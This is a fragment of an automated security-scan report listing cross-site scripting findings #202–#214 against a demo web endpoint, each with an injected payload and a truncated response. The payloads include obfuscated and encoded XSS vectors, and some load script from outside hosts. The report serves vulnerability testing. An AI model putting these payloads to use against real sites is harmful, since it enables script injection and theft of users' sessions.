src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #202\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-\n0080c744f389><param name=url value=javascript:alert('XSS'\n)></OBJECT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #203\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <EMBED SRC=\"http://soapui.org/xss.swf\" \nAllowScriptAccess=\"always\"></EMBED>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #204\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH \nA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv \nMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs \naW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw\nIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh \nTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"\nalways\"></EMBED>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head\n/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window._\n_DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk \nWidget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/\nekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End \nof Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" \ntype=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZ\nVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIk\niLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints on \nyour systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will not be demouser@deepfence.io \nechoed back in the response\nCWE-ID CWE-79\nIssue Number #205\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io a=\"get\";b=\"URL(\\\"\";c=\"javascript:\";d=\"alert('XSS');\\\")\";eval(\na+b+c+d);\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #206\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]] ><![CDATA[\ncript:alert('XSS');\">]] ></C></X></xml><SPAN DATASRC=#I \nDATAFLD=C DATAFORMATAS=HTML></SPAN>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #207\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.io<XML ID=\"xss\"><I><B>&lt;IMG SRC=\"javas<!-- -->cript:alert('\nXSS')\"&gt;</B></I></XML><SPAN DATASRC=\"#xss\" \nDATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #208\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io<HTML><BODY><?xml:namespace prefix=\"t\" ns=\"urn:\nschemas-microsoft-com:time\"><?import namespace=\"t\" \nimplementation=\"#default#time2\"><t:set attributeName=\"\ninnerHTML\" to=\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&\nquot;)&lt;/SCRIPT&gt;\"></BODY></HTML>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #209\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <SCRIPT SRC=\"http://soapui.org/xss.jpg\"></SCRIPT>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #210\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io <? echo('<SCR)';echo('IPT>alert(\"XSS\")</SCRIPT>'); ?\n>\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #211\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <IMG SRC=\"http://soapui.org/somecommand.php?\nsomevariables=maliciouscode\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #212\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io Redirect 302 /a.jpg http://soapui.org/admin.asp&\ndeleteuser\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #213\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=&lt;\nSCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;\">\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You should ensure that HTML tags passed into the parameter will demouser@deepfence.io \nnot be echoed back in the response\nCWE-ID CWE-79\nIssue Number #214\nScan Cross Site Scripting\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT\n=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-\nalert('XSS');+ADw-/SCRIPT+AD4-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 